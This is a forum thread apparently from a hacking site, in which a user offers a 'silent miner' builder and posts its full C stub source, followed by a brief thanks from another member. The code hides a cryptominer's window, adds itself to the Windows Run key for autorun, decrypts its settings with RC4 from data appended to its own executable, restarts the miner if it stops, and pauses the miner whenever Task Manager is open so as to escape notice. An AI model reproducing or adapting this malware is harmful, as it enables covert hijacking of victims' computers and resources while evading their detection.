1. To visit protected / private sections of the forum you must be connected with your user account. If you are not yet a member of our forum, you can create it now for free!.

User Tag List

Thread: [Builder] Silent miner for babies (Src+Bin)

Results 1 to 2 of 2

  1. #1
    Fortran66's Avatar
    Junior Member
    Join Date May 2017
    Posts 10
    Like (Stats)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    0 Post(s)

    [Builder] Silent miner for babies (Src+Bin)

    This appliction is builder for generate executable file with next features:

    * Autorun
    * Running miner in hide mode (it`s just don`t show window running executable, no rootkits)
    * Checking for running task manager, if need it "froze" miner
    * Checking for running miner, if not then run it (again).

    Builder able to change appname for autorun in registry and path to miner`s executable file (it can be abs. and rel. paths, but can`t contains environment variables). Size of generating file will be about 5 kb. Builder has open source, so if you don`t trust binary exe , you can look at source and compile it. For compilation you must have MS Studo and PureBasic.

    Pass for zip file: Fortran66

    Screenshot:
    Click image for larger version. 

Name:	screenshot.jpg 
Views:	16 
Size:	80.7 KB 
ID:	6844

    C code from stub.c file:
    Code:
    // SILENT MINER FOR BABIES (c) FORTRAN66
    // COMPILER: C++ Visual Studio
    //
    // You can donate this project
    // bitcoin:1M5C89pFBoKrP5bwSCwK1AYTjogZ9qEiro
    
    #include <windows.h>
    #include <tlhelp32.h>
    #include <stdint.h>
    
    #pragma comment(linker, "/SUBSYSTEM:WINDOWS,5.01 /ENTRY:miner_main ")
    
    #pragma comment(lib, "kernel32.lib")
    #pragma comment(lib, "user32.lib")
    #pragma comment(lib, "advapi32.lib")
    
    #define _wcscat(a,b) lstrcatW(a,b)
    #define _wcslen(a) lstrlenW(a)
    #define _wcscmpi(a,b) lstrcmpiW(a,b)
    
    #define _malloc(memsize) VirtualAlloc(NULL, memsize, MEM_COMMIT, PAGE_READWRITE)
    #define _free(p) VirtualFree(p, 0, MEM_RELEASE)
    
    typedef struct _RC4ctx {
      uint8_t s[0x100];
      uint32_t i, j;
    } RC4ctx, *pRC4ctx;
    
    #pragma pack(push, 1)
    typedef struct eof_settings {
      uint16_t wSize;
      uint16_t wName;
      uint16_t wCmdLine;
      WCHAR buffer[0x800];
    } eof_settings_t, *peof_settings_t;
    #pragma pack(pop)
    
    void _memset(void *s, uint8_t c, size_t n) {
      unsigned char *s_ = s;
      for (int i = 0; i < n; ++i) s_[i] = c;
      return;
    }
    
    void _memcpy(void *s, const void *ct, size_t n) {
      for (int i = 0; i < n; ++i) ((char *)s)[i] = ((char *)ct)[i];
      return;
    }
    
    void rc4Init(RC4ctx *context, const uint8_t *key, size_t length) {
      uint32_t i;
      uint32_t j;
      uint8_t temp;
      context->i = 0;
      context->j = 0;
      for(i = 0; i < 256; i++)
        context->s[i] = i;
      for(i = 0, j = 0; i < 256; i++) {
        j = (j + context->s[i] + key[i % length]) % 256;
        temp = context->s[i];
        context->s[i] = context->s[j];
        context->s[j] = temp;
      }
      return;
    }
    
    void rc4Cipher(RC4ctx *context, uint8_t *mem, size_t length) {
      uint8_t temp;
      uint32_t i = context->i;
      uint32_t j = context->j;
      uint8_t *s = context->s;
      while(length > 0) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        temp = s[i];
        s[i] = s[j];
        s[j] = temp;
        *mem = *mem ^ s[(s[i] + s[j]) % 256];
        mem++;
        length--;
      }
      context->i = i;
      context->j = j;
      return;
    }
    
    BOOL RegisterMyProgramForStartup(PCWSTR pszAppName, PCWSTR pathToExe, PCWSTR args) {
      HKEY hKey = NULL;
      LONG lResult = 0;
      BOOL fSuccess = TRUE;
      DWORD dwSize;
      WCHAR buff[] = {L'S',L'o',L'f',L't',L'w',L'a',L'r',L'e',L'\\',L'M',L'i',L'c',L'r',L'o',L's',L'o',L'f',L't',\
        L'\\',L'W',L'i',L'n',L'd',L'o',L'w',L's',L'\\',L'C',L'u',L'r',L'r',L'e',L'n',L't',L'V',L'e',L'r',L's',L'i',L'o',L'n',\
        L'\\',L'R',L'u',L'n',0};
    
      WCHAR szValue[MAX_PATH*2];
      _memset(szValue, 0, MAX_PATH*4);
      szValue[0] = L'\"';
      _wcscat(szValue, pathToExe);
      int i = _wcslen(szValue);
      szValue[i] = L'\"';
      szValue[i+1] = L' ';
      if (args != NULL) {
        _wcscat(szValue, args);
      }
      lResult = RegCreateKeyExW(HKEY_CURRENT_USER, buff, 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &hKey, NULL);
      fSuccess = (lResult == 0);
      if (fSuccess) {
        dwSize = (_wcslen(szValue) + 1) * 2;
        lResult = RegSetValueExW(hKey, pszAppName, 0, REG_SZ, (BYTE*)szValue, dwSize);
        fSuccess = (lResult == 0);
      }
      if (hKey != NULL) {
        RegCloseKey(hKey);
        hKey = NULL;
      }
      return fSuccess;
    }
    
    int detect_taskmgr(void) {
      WCHAR taskmgr_name[] = {L't', L'a', L's', L'k', L'm', L'g', L'r', L'.',L'e',L'x',L'e',0};
      int ret = FALSE;
      PROCESSENTRY32W processEntry;
      processEntry.dwSize = sizeof(PROCESSENTRY32W);
      HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
      if (Process32FirstW(hSnapshot, &processEntry) == TRUE) {
        while (Process32NextW(hSnapshot, &processEntry) == TRUE) {
          if (!_wcscmpi(processEntry.szExeFile, taskmgr_name)) {
            ret = TRUE;
            break;
          };
        };
      };
      CloseHandle(hSnapshot);
      return(ret);
    }
    
    void miner_main() {
      LARGE_INTEGER li;
      WCHAR szPathToExe[MAX_PATH];
      STARTUPINFOW si;
      PROCESS_INFORMATION pi;
      HANDLE hFileExe;
      uint32_t exitCode;
      void *eof = NULL;
      size_t eof_size = 0;
      char rc4key[] = {'m','i','c','r','o',' ','m','i','n','e','r'};
      RC4ctx rc4ctx;
      uint32_t dwHiddenProcessId;
      HANDLE hChildProcess;
      rc4Init(&rc4ctx, rc4key, 11);
      GetModuleFileNameW(NULL, szPathToExe, MAX_PATH);
      hFileExe = CreateFileW(szPathToExe, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
      if (hFileExe != INVALID_HANDLE_VALUE) {
        uint32_t exefilesize;
        void *exefilebuffer;
        GetFileSizeEx(hFileExe, &li);
        exefilesize = li.LowPart;
        exefilebuffer = _malloc(exefilesize);
        if (exefilebuffer) {
          uint32_t read;
          if (ReadFile(hFileExe, exefilebuffer, exefilesize, &read, NULL) && (exefilesize == read)) {
            size_t pe_size = 0;
            if (((IMAGE_DOS_HEADER *)exefilebuffer)->e_magic == IMAGE_DOS_SIGNATURE) {
              PIMAGE_NT_HEADERS ntheader = (PIMAGE_NT_HEADERS)&((unsigned char *)(exefilebuffer))[((IMAGE_DOS_HEADER *)exefilebuffer)->e_lfanew];
              if (ntheader->Signature == IMAGE_NT_SIGNATURE) {
                uint16_t nSections = ntheader->FileHeader.NumberOfSections;
                uint32_t nDirEntries = ntheader->OptionalHeader.NumberOfRvaAndSizes;
                PIMAGE_SECTION_HEADER sections = (PIMAGE_SECTION_HEADER)&ntheader->OptionalHeader.DataDirectory[nDirEntries];
                pe_size = sections[nSections-1].PointerToRawData+sections[nSections-1].SizeOfRawData;
                if (pe_size && (eof_size = exefilesize - pe_size) && (eof = _malloc(exefilesize))) {
                  _memcpy(eof, &((char *)exefilebuffer)[pe_size], eof_size);
                }
              }
            }
          };
          _free(exefilebuffer);
        }
        CloseHandle(hFileExe);
        if (!(eof && eof_size) || (eof_size < 0x16)) 
          ExitProcess(0);
        rc4Cipher(&rc4ctx, eof, eof_size);
        peof_settings_t settings = (peof_settings_t)eof;
        if (settings->wSize != eof_size)
          ExitProcess(0);
        RegisterMyProgramForStartup(&settings->buffer[settings->wName], szPathToExe, NULL);
        _memset(&si, 0, sizeof(STARTUPINFOW));
        _memset(&pi, 0, sizeof(PROCESS_INFORMATION));
        si.cb = sizeof(STARTUPINFO);
        si.dwFlags = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_HIDE;
        CreateProcessW(NULL, &settings->buffer[settings->wCmdLine], NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);
        hChildProcess = pi.hProcess;
        int flag = FALSE;
        while (TRUE) {
          if (GetExitCodeProcess(hChildProcess, &exitCode) && (exitCode != STILL_ACTIVE)) {
            _memset(&si, 0, sizeof(STARTUPINFOW));
            _memset(&pi, 0, sizeof(PROCESS_INFORMATION));
            si.cb = sizeof(STARTUPINFO);
            si.dwFlags = STARTF_USESHOWWINDOW;
            si.wShowWindow = SW_HIDE;
            CreateProcessW(NULL, &settings->buffer[settings->wCmdLine], NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);
            dwHiddenProcessId = pi.dwProcessId;
            hChildProcess = pi.hProcess;
          }
          if (detect_taskmgr()) {
            if (!flag)
              DebugActiveProcess(dwHiddenProcessId);
            flag = TRUE;
          } else {
            if (flag)
              DebugActiveProcessStop(dwHiddenProcessId);
            flag = FALSE;
          }
          Sleep(500);
        }
      }
      return;
    }
    Attached Files
  2. Likes Hess, KraKar, 4nxiety liked this post
  3. #2
    4nxiety's Avatar
    Member
    Join Date May 2010
    Location In Hell
    Posts 74
    Like (Stats)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    Quoted
    3 Post(s)
    Thx bro.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Silent BitCoin GPU Miner using Phoenix Miner
    By itz me in forum C Snippets
    Replies: 23
    Last Post: 02-08-2014, 10:00
  2. Replies: 0
    Last Post: 28-02-2011, 02:11

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Tags for this Thread